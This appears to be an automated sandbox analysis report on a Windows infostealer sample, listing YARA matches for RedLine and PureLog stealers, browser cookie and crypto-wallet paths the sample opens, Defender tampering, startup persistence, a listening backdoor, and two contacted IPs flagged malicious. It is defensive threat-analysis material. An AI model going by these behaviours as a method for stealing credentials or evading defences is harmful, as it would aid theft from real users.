Source: file.exe, 00000000.00000002.3280784216.00000000049E6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.00000000049D4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3296009527.0000000008990000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3296547554.0000000008A0E000.00000004.00000020.00020000.00000000.sdmp, 123.exe, 00000003.00000002.2357941483.0000000006A61000.00000004.00000020.00020000.00000000.sdmp, 123.exe, 00000003.00000002.2357941483.0000000006A7F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 123.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information
barindex
Yara detected PureLog Stealer
Source: Yara match File source: 0.2.file.exe.7590000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.4800ee8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.45edbe6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.45edbe6.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.4800000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.45eccfe.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.4800000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.4800ee8.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.7590000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.45eccfe.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.3280253389.00000000045AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.3280551668.0000000004800000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.3289464221.0000000007590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2079601696.0000000006D61000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Yara detected RedLine Stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0.2.file.exe.7590000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.4800ee8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.45edbe6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.45edbe6.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.4800000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.45eccfe.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.4800000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.4800ee8.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.7590000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.45eccfe.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.3280253389.00000000045AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.3280551668.0000000004800000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.3289464221.0000000007590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000005D.00000003.2800628651.0000000007379000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2079601696.0000000006D61000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 6472, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mig.exe PID: 6220, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\1.exe, type: DROPPED
Source: Yara match File source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\1.exe, type: DROPPED
Found many strings related to Crypto-Wallets (likely being stolen)
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Electrum\walletsE#
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: JaxxE#
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ExodusE#
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: EthereumE#
Source: file.exe, 00000000.00000002.3280253389.00000000045AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: set_UseMachineKeyStore
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\ Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 6472, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected PureLog Stealer
Source: Yara match File source: 0.2.file.exe.7590000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.4800ee8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.45edbe6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.45edbe6.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.4800000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.45eccfe.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.4800000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.4800ee8.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.7590000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.45eccfe.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.3280253389.00000000045AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.3280551668.0000000004800000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.3289464221.0000000007590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2079601696.0000000006D61000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Yara detected RedLine Stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0.2.file.exe.7590000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.4800ee8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.45edbe6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.45edbe6.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.4800000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.45eccfe.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.4800000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.4800ee8.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.7590000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.45eccfe.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.3280253389.00000000045AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.3280551668.0000000004800000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.3289464221.0000000007590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000005D.00000003.2800628651.0000000007379000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2079601696.0000000006D61000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 6472, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mig.exe PID: 6220, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\1.exe, type: DROPPED
Source: Yara match File source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\1.exe, type: DROPPED
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C5DA3 bind,WSAGetLastError, 16_2_00007FF8A87C5DA3
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8BA24622C _PyArg_ParseTuple_SizeT,PyEval_SaveThread,listen,PyEval_RestoreThread,_Py_NoneStruct,_Py_NoneStruct, 16_2_00007FF8BA24622C
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8BA2420F0 _PyArg_ParseTuple_SizeT,htons,htonl,PySys_Audit,PyEval_SaveThread,bind,PyEval_RestoreThread,_Py_NoneStruct,_Py_NoneStruct,PyExc_OSError,PyExc_TypeError,PyErr_Format,PyExc_OverflowError,PyErr_ExceptionMatches,PyExc_OverflowError,PyErr_Format,_Py_Dealloc,_PyArg_ParseTuple_SizeT,_Py_Dealloc,htons, 16_2_00007FF8BA2420F0
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1466434 Sample: file.exe Startdate: 02/07/2024 Architecture: WINDOWS Score: 100 112 Snort IDS alert for network traffic 2->112 114 Found malware configuration 2->114 116 Malicious sample detected (through community Yara rule) 2->116 118 12 other signatures 2->118 9 Wmiic.exe 1 2->9         started        11 file.exe 3 2->11         started        16 svchost.exe 2->16         started        process3 dnsIp4 18 svchosl.exe 16 9->18         started        22 conhost.exe 9->22         started        106 77.221.149.185, 49712, 49713, 5988 INFOBOX-ASInfoboxruAutonomousSystemRU Russian Federation 11->106 108 147.45.78.229, 43674, 49704 FREE-NET-ASFREEnetEU Russian Federation 11->108 98 C:\Users\mig.exe, PE32 11->98 dropped 100 C:\Users\123.exe, PE32 11->100 dropped 102 C:\Users\user\AppData\Local\...\file.exe.log, ASCII 11->102 dropped 156 Detected unpacking (overwrites its own PE header) 11->156 158 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 11->158 160 Found many strings related to Crypto-Wallets (likely being stolen) 11->160 162 3 other signatures 11->162 24 mig.exe 11->24         started        26 123.exe 7 11->26         started        file5 signatures6 process7 file8 82 C:\Windows\Temp\_MEI65122\unicodedata.pyd, PE32+ 18->82 dropped 84 C:\Windows\Temp\_MEI65122\select.pyd, PE32+ 18->84 dropped 86 C:\Windows\Temp\_MEI65122\python38.dll, PE32+ 18->86 dropped 96 10 other files (7 malicious) 18->96 dropped 120 Potentially malicious time measurement code found 18->120 28 svchosl.exe 1 18->28         started        31 conhost.exe 18->31         started        88 C:\ProgramData\migrate.exe, PE32 24->88 dropped 90 C:\ProgramData\1.exe, PE32 24->90 dropped 122 Machine Learning detection for dropped file 24->122 124 Encrypted powershell cmdline option found 24->124 126 Modifies Windows Defender protection settings 24->126 128 2 other signatures 24->128 33 cmd.exe 24->33         started        35 powershell.exe 24->35         started        37 powershell.exe 24->37         started        39 powershell.exe 24->39         started        92 C:\ProgramData\MicrosoftSystem\svchosl.exe, PE32+ 26->92 dropped 94 C:\ProgramData\MicrosoftSystem\Wmiic.exe, PE32+ 26->94 dropped 41 cmd.exe 1 26->41         started        signatures9 process10 signatures11 142 Excessive usage of taskkill to terminate processes 28->142 43 cmd.exe 1 28->43         started        57 48 other processes 28->57 46 cmd.exe 33->46         started        49 conhost.exe 33->49         started        144 Uses schtasks.exe or at.exe to add and modify task schedules 35->144 146 Loading BitLocker PowerShell Module 35->146 51 conhost.exe 35->51         started        59 12 other processes 37->59 53 conhost.exe 39->53         started        148 Drops PE files to the startup folder 41->148 150 Modifies Windows Defender protection settings 41->150 152 Adds extensions / path to Windows Defender exclusion list 41->152 154 Disables Windows Defender (via service or powershell) 41->154 55 Wmiic.exe 6 1 41->55         started        61 5 other processes 41->61 process12 file13 130 Excessive usage of taskkill to terminate processes 43->130 63 taskkill.exe 43->63         started        104 C:\ProgramData\Microsoft\Windows\...\1.exe, PE32 46->104 dropped 132 Modifies Windows Defender protection settings 46->132 134 Adds extensions / path to Windows Defender exclusion list 46->134 136 Disables Windows Defender (via service or powershell) 46->136 65 powershell.exe 46->65         started        68 powershell.exe 46->68         started        76 13 other processes 46->76 138 Antivirus detection for dropped file 55->138 140 Multi AV Scanner detection for dropped file 55->140 70 conhost.exe 55->70         started        78 47 other processes 57->78 80 3 other processes 59->80 72 conhost.exe 61->72         started        74 net1.exe 1 61->74         started        signatures14 process15 signatures16 110 Loading BitLocker PowerShell Module 65->110
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
147.45.78.229
 unknown Russian Federation
2895 FREE-NET-ASFREEnetEU true
77.221.149.185
 unknown Russian Federation
30968 INFOBOX-ASInfoboxruAutonomousSystemRU true

Contacted URLs

Name Malicious Antivirus Detection Reputation
147.45.78.229:43674 true
  • Avira URL Cloud: safe
 unknown